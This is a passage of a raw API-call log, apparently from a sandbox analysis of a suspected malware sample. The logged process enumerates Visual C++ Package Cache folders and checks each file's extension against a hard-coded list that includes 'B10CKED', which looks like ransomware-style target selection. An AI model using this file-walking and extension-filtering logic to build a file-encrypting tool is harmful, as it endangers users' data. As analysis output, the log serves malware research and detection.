lpsz="C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\", cchLength=0x53 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}V12.0.21005\\") returned 0x53 [0110.174] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\", cchLength=0x53 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}V12.0.21005\\") returned 0x53 [0110.174] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\", cchLength=0x53 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}V12.0.21005\\") returned 0x53 [0110.175] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\", cchLength=0x53 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}V12.0.21005\\") returned 0x53 [0110.175] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\", cchLength=0x53 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}V12.0.21005\\") returned 0x53 [0110.175] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\", cchLength=0x53 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}V12.0.21005\\") returned 0x53 [0110.175] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\", cchLength=0x53 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}V12.0.21005\\") returned 0x53 [0110.175] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\", cchLength=0x53 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}V12.0.21005\\") returned 0x53 [0110.175] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\", cchLength=0x53 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}V12.0.21005\\") returned 0x53 [0110.175] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\", cchLength=0x53 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}V12.0.21005\\") returned 0x53 [0110.175] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\*.*", lpFindFileData=0x12ee90 | out: lpFindFileData=0x12ee90) returned 0x1c7f68 [0110.420] FindNextFileW (in: hFindFile=0x1c7f68, lpFindFileData=0x12ee90 | out: lpFindFileData=0x12ee90) returned 1 [0110.420] FindNextFileW (in: hFindFile=0x1c7f68, lpFindFileData=0x12ee90 | out: lpFindFileData=0x12ee90) returned 1 [0110.420] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\", cchLength=0x5c | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}V12.0.21005\\PACKAGES\\") returned 0x5c [0110.420] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\", cchLength=0x5c | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}V12.0.21005\\PACKAGES\\") returned 0x5c [0110.420] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\", cchLength=0x5c | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}V12.0.21005\\PACKAGES\\") returned 0x5c [0110.420] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\", cchLength=0x5c | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}V12.0.21005\\PACKAGES\\") returned 0x5c [0110.420] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\", cchLength=0x5c | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}V12.0.21005\\PACKAGES\\") returned 0x5c [0110.420] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\", cchLength=0x5c | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}V12.0.21005\\PACKAGES\\") returned 0x5c [0110.420] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\", cchLength=0x5c | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}V12.0.21005\\PACKAGES\\") returned 0x5c [0110.420] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\", cchLength=0x5c | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}V12.0.21005\\PACKAGES\\") returned 0x5c [0110.420] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\", cchLength=0x5c | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}V12.0.21005\\PACKAGES\\") returned 0x5c [0110.420] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\", cchLength=0x5c | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}V12.0.21005\\PACKAGES\\") returned 0x5c [0110.421] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\", cchLength=0x5c | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}V12.0.21005\\PACKAGES\\") returned 0x5c [0110.421] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\", cchLength=0x5c | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}V12.0.21005\\PACKAGES\\") returned 0x5c [0110.421] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\", cchLength=0x5c | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}V12.0.21005\\PACKAGES\\") returned 0x5c [0110.421] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\", cchLength=0x5c | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}V12.0.21005\\PACKAGES\\") returned 0x5c [0110.421] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\", cchLength=0x5c | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}V12.0.21005\\PACKAGES\\") returned 0x5c [0110.421] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\", cchLength=0x5c | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}V12.0.21005\\PACKAGES\\") returned 0x5c [0110.421] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\", cchLength=0x5c | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}V12.0.21005\\PACKAGES\\") returned 0x5c [0110.421] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\", cchLength=0x5c | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}V12.0.21005\\PACKAGES\\") returned 0x5c [0110.421] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\*.*", lpFindFileData=0x12ebcc | out: lpFindFileData=0x12ebcc) returned 0x1c7fa8 [0110.421] FindNextFileW (in: hFindFile=0x1c7fa8, lpFindFileData=0x12ebcc | out: lpFindFileData=0x12ebcc) returned 1 [0110.421] FindNextFileW (in: hFindFile=0x1c7fa8, lpFindFileData=0x12ebcc | out: lpFindFileData=0x12ebcc) returned 1 [0110.421] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\", cchLength=0x71 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}V12.0.21005\\PACKAGES\\VCRUNTIMEMINIMUM_X86\\") returned 0x71 [0110.421] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\", cchLength=0x71 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}V12.0.21005\\PACKAGES\\VCRUNTIMEMINIMUM_X86\\") returned 0x71 [0110.421] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\", cchLength=0x71 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}V12.0.21005\\PACKAGES\\VCRUNTIMEMINIMUM_X86\\") returned 0x71 [0110.421] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\", cchLength=0x71 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}V12.0.21005\\PACKAGES\\VCRUNTIMEMINIMUM_X86\\") returned 0x71 [0110.421] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\", cchLength=0x71 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}V12.0.21005\\PACKAGES\\VCRUNTIMEMINIMUM_X86\\") returned 0x71 [0110.421] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\", cchLength=0x71 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}V12.0.21005\\PACKAGES\\VCRUNTIMEMINIMUM_X86\\") returned 0x71 [0110.421] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\", cchLength=0x71 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}V12.0.21005\\PACKAGES\\VCRUNTIMEMINIMUM_X86\\") returned 0x71 [0110.421] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\", cchLength=0x71 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}V12.0.21005\\PACKAGES\\VCRUNTIMEMINIMUM_X86\\") returned 0x71 [0110.421] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\", cchLength=0x71 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}V12.0.21005\\PACKAGES\\VCRUNTIMEMINIMUM_X86\\") returned 0x71 [0110.421] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\", cchLength=0x71 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}V12.0.21005\\PACKAGES\\VCRUNTIMEMINIMUM_X86\\") returned 0x71 [0110.421] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\", cchLength=0x71 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}V12.0.21005\\PACKAGES\\VCRUNTIMEMINIMUM_X86\\") returned 0x71 [0110.421] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\", cchLength=0x71 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}V12.0.21005\\PACKAGES\\VCRUNTIMEMINIMUM_X86\\") returned 0x71 [0110.421] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\", cchLength=0x71 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}V12.0.21005\\PACKAGES\\VCRUNTIMEMINIMUM_X86\\") returned 0x71 [0110.421] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\", cchLength=0x71 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}V12.0.21005\\PACKAGES\\VCRUNTIMEMINIMUM_X86\\") returned 0x71 [0110.421] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\", cchLength=0x71 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}V12.0.21005\\PACKAGES\\VCRUNTIMEMINIMUM_X86\\") returned 0x71 [0110.421] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\", cchLength=0x71 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}V12.0.21005\\PACKAGES\\VCRUNTIMEMINIMUM_X86\\") returned 0x71 [0110.421] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\", cchLength=0x71 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}V12.0.21005\\PACKAGES\\VCRUNTIMEMINIMUM_X86\\") returned 0x71 [0110.421] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\", cchLength=0x71 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}V12.0.21005\\PACKAGES\\VCRUNTIMEMINIMUM_X86\\") returned 0x71 [0110.421] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\*.*", lpFindFileData=0x12e908 | out: lpFindFileData=0x12e908) returned 0x1c7fe8 [0110.435] FindNextFileW (in: hFindFile=0x1c7fe8, lpFindFileData=0x12e908 | out: lpFindFileData=0x12e908) returned 1 [0110.435] FindNextFileW (in: hFindFile=0x1c7fe8, lpFindFileData=0x12e908 | out: lpFindFileData=0x12e908) returned 1 [0110.435] CharUpperBuffW (in: lpsz="cab", cchLength=0x3 | out: lpsz="CAB") returned 0x3 [0110.435] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AST", cchCount1=3, lpString2="CAB", cchCount2=3) returned 1 [0110.435] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AFN", cchCount1=3, lpString2="CAB", cchCount2=3) returned 1 [0110.435] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ELST", cchCount1=4, lpString2="CAB", cchCount2=3) returned 3 [0110.435] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EXE", cchCount1=3, lpString2="CAB", cchCount2=3) returned 3 [0110.435] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNK", cchCount1=3, lpString2="CAB", cchCount2=3) returned 3 [0110.435] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTA", cchCount1=3, lpString2="CAB", cchCount2=3) returned 3 [0110.435] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PEK", cchCount1=3, lpString2="CAB", cchCount2=3) returned 3 [0110.435] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="CAB", cchCount2=3) returned 3 [0110.435] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="B10CKED", cchCount1=7, lpString2="CAB", cchCount2=3) returned 1 [0110.435] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="CAB", cchCount2=3) returned 3 [0110.435] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="CAB", cchCount2=3) returned 3 [0110.435] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="000", cchCount1=3, lpString2="CAB", cchCount2=3) returned 1 [0110.435] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SYS", cchCount1=3, lpString2="CAB", cchCount2=3) returned 3 [0110.435] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="CAB", cchCount2=3) returned 3 [0110.435] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="CAB", cchCount2=3) returned 3 [0110.435] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INF", cchCount1=3, lpString2="CAB", cchCount2=3) returned 3 [0110.435] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="CAB", cchCount2=3) returned 3 [0110.436] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="CAB", cchCount2=3) returned 3 [0110.436] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REG", cchCount1=3, lpString2="CAB", cchCount2=3) returned 3 [0110.436] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DRV", cchCount1=3, lpString2="CAB", cchCount2=3) returned 3 [0110.436] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DEV", cchCount1=3, lpString2="CAB", cchCount2=3) returned 3 [0110.436] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PIF", cchCount1=3, lpString2="CAB", cchCount2=3) returned 3 [0110.436] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MBR", cchCount1=3, lpString2="CAB", cchCount2=3) returned 3 [0110.436] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INI", cchCount1=3, lpString2="CAB", cchCount2=3) returned 3 [0110.436] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="CAB", cchCount2=3) returned 3 [0110.436] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LIST", cchCount1=4, lpString2="CAB", cchCount2=3) returned 3 [0110.436] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TTF", cchCount1=3, lpString2="CAB", cchCount2=3) returned 3 [0110.436] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG", cchCount1=3, lpString2="CAB", cchCount2=3) returned 3 [0110.436] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JA", cchCount1=2, lpString2="CAB", cchCount2=3) returned 3 [0110.436] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="COM", cchCount1=3, lpString2="CAB", cchCount2=3) returned 3 [0110.436] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BAT", cchCount1=3, lpString2="CAB", cchCount2=3) returned 1 [0110.436] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CMD", cchCount1=3, lpString2="CAB", cchCount2=3) returned 3 [0110.436] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="CAB", cchCount2=3) returned 3 [0110.436] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JS", cchCount1=2, lpString2="CAB", cchCount2=3) returned 3 [0110.436] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CFG", cchCount1=3, lpString2="CAB", cchCount2=3) returned 3 [0110.436] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DOWNLOAD", cchCount1=8, lpString2="CAB", cchCount2=3) returned 3 [0110.436] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NFO", cchCount1=3, lpString2="CAB", cchCount2=3) returned 3 [0110.436] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSI", cchCount1=3, lpString2="CAB", cchCount2=3) returned 3 [0110.436] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHK", cchCount1=3, lpString2="CAB", cchCount2=3) returned 3 [0110.436] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DMP", cchCount1=3, lpString2="CAB", cchCount2=3) returned 3 [0110.436] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MUI", cchCount1=3, lpString2="CAB", cchCount2=3) returned 3 [0110.436] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DUN", cchCount1=3, lpString2="CAB", cchCount2=3) returned 3 [0110.436] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISP", cchCount1=3, lpString2="CAB", cchCount2=3) returned 3 [0110.436] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISW", cchCount1=3, lpString2="CAB", cchCount2=3) returned 3 [0110.437] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CAB", cchCount1=3, lpString2="CAB", cchCount2=3) returned 2 [0110.437] FindNextFileW (in: hFindFile=0x1c7fe8, lpFindFileData=0x12e908 | out: lpFindFileData=0x12e908) returned 1 [0110.437] CharUpperBuffW (in: lpsz="msi", cchLength=0x3 | out: lpsz="MSI") returned 0x3 [0110.437] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AST", cchCount1=3, lpString2="MSI", cchCount2=3) returned 1 [0110.437] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AFN", cchCount1=3, lpString2="MSI", cchCount2=3) returned 1 [0110.437] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ELST", cchCount1=4, lpString2="MSI", cchCount2=3) returned 1 [0110.437] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EXE", cchCount1=3, lpString2="MSI", cchCount2=3) returned 1 [0110.437] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNK", cchCount1=3, lpString2="MSI", cchCount2=3) returned 1 [0110.437] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTA", cchCount1=3, lpString2="MSI", cchCount2=3) returned 1 [0110.437] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PEK", cchCount1=3, lpString2="MSI", cchCount2=3) returned 3 [0110.437] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="MSI", cchCount2=3) returned 3 [0110.437] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="B10CKED", cchCount1=7, lpString2="MSI", cchCount2=3) returned 1 [0110.437] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="MSI", cchCount2=3) returned 3 [0110.437] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="MSI", cchCount2=3) returned 1 [0110.437] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="000", cchCount1=3, lpString2="MSI", cchCount2=3) returned 1 [0110.437] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SYS", cchCount1=3, lpString2="MSI", cchCount2=3) returned 3 [0110.437] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="MSI", cchCount2=3) returned 1 [0110.437] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="MSI", cchCount2=3) returned 3 [0110.437] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INF", cchCount1=3, lpString2="MSI", cchCount2=3) returned 1 [0110.437] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="MSI", cchCount2=3) returned 1 [0110.437] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="MSI", cchCount2=3) returned 1 [0110.437] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REG", cchCount1=3, lpString2="MSI", cchCount2=3) returned 3 [0110.437] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DRV", cchCount1=3, lpString2="MSI", cchCount2=3) returned 1 [0110.437] 